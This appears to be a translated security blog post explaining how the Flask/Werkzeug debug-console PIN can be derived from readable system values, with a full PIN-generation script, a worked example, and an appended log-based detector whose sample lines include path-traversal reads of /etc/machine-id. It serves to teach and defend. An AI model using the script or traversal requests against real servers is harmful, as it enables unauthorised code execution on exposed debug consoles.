Security of the PIN in Flask Debug Mode

Author: print("") Category: Uncategorized Published: 2020-08-12 17:45

Original article: https://xz.aliyun.com/t/8092

Environment:

CentOS 8

Python 3.6

Flask 1.1.2

First, confirm the Flask version:

#python
Python 3.6.8 (default, Nov 21 2019, 19:31:34) 
[GCC 8.3.1 20190507 (Red Hat 8.3.1-4)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import flask
>>> flask.__version__
'1.1.2'
>>> flask.__version__
'1.1.2'

Here is the initial payload script:

import hashlib
from itertools import chain
probably_public_bits = [
    'root',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'  # getattr(mod, '__file__', None),
]

private_bits = [
    '52228526895',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '75d03aa852be476cbe73544c93e98276'# get_machine_id(), /etc/machine-id
]

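# Feed every input into a single MD5 hash, in order, skipping empty values.
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

# Add the PIN salt and take the first nine decimal digits of the digest.
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

# Split the digits into dash-separated groups for display.
rv = None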
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

First, the following values need to be determined:

probably_public_bits = [
    'root',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'  # getattr(mod, '__file__', None),
]

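The first three values do not need to change; only the last one does.

First, make Flask throw an error so that the traceback shows where flask/app.py is installed.

The last value is:

/usr/local/lib/python3.6/site-packages/flask/app.py

This gives: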

probably_public_bits = [
    'root',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.6/site-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

That leaves the two values in private_bits:

private_bits = [
    '52228526895',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '75d03aa852be476cbe73544c93e98276'# get_machine_id(), /etc/machine-id
]

The first one is str(uuid.getnode()), the MAC address.

Read it from one of these two paths: /sys/class/net/eth0/address or /sys/class/net/ens33/address

Alternatively, simply write a route that returns it:

import uuid
# Helper route: returns the MAC address as a decimal integer string
@app.route('/tips', methods=['GET'])
def tips():
    return str(uuid.getnode())

This returns the MAC address as a decimal number.

The second value can be read directly:

#cat /etc/machine-id
1cc3a23e80024d81aebf4e9f2b94a569

Putting the values together:

probably_public_bits = [
    'root',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.6/site-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
    '52232902079',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '1cc3a23e80024d81aebf4e9f2b94a569'# get_machine_id(), /etc/machine-id
]

Then run the script:

#python ac.py 
320-808-369
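
Because every PIN input above is a readable file or a predictable string, the PIN is not a secret once a file-read bug exists, so the useful defensive signal is the access pattern itself. The following is an added detection example, not code from the original article or from Flask/Werkzeug: it flags requests that reference the PIN input files and Werkzeug debugger requests (the `__debugger__=yes` and `cmd=pinauth` query parameters), then correlates them per client. The log format, the `/download` endpoint and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Files the article reads to recover the two private PIN inputs.
PIN_INPUT_PATHS = ("/etc/machine-id", "/sys/class/net/")
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')

# Constructed sample lines (not real traffic); /download is a hypothetical endpoint.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2020:17:40:01 +0800] "GET /download?file=../../etc/machine-id HTTP/1.1" 200 33
203.0.113.7 - - [12/Aug/2020:17:40:09 +0800] "GET /download?file=%2Fsys%2Fclass%2Fnet%2Feth0%2Faddress HTTP/1.1" 200 18
203.0.113.7 - - [12/Aug/2020:17:41:30 +0800] "GET /console?__debugger__=yes&cmd=pinauth&pin=000-000-000&s=x HTTP/1.1" 200 36
198.51.100.4 - - [12/Aug/2020:17:42:00 +0800] "GET /index HTTP/1.1" 200 512
"""


def classify(line):
    """Return (client_ip, tag) for a suspicious request line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    parts = urlsplit(target)
    decoded = unquote(parts.path + "?" + parts.query)
    if any(p in decoded for p in PIN_INPUT_PATHS):
        return ip, "pin-input-read"
    args = parse_qs(parts.query)
    if args.get("__debugger__") == ["yes"]:
        return ip, "debugger-" + args.get("cmd", ["unknown"])[0]
    return None


def findings(log_text):
    """All suspicious (ip, tag) pairs, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


def suspects(log_text):
    """Clients that both touched PIN input files and attempted console PIN auth."""
    tags = {}
    for ip, tag in findings(log_text):
        tags.setdefault(ip, set()).add(tag)
    return sorted(ip for ip, t in tags.items()
                  if {"pin-input-read", "debugger-pinauth"} <= t)


if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG):
        print(*hit)
    print("correlated:", suspects(SAMPLE_LOG))
```

Any `debugger-*` hit on a production host is itself a finding, since it means the debugger middleware is reachable at all.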
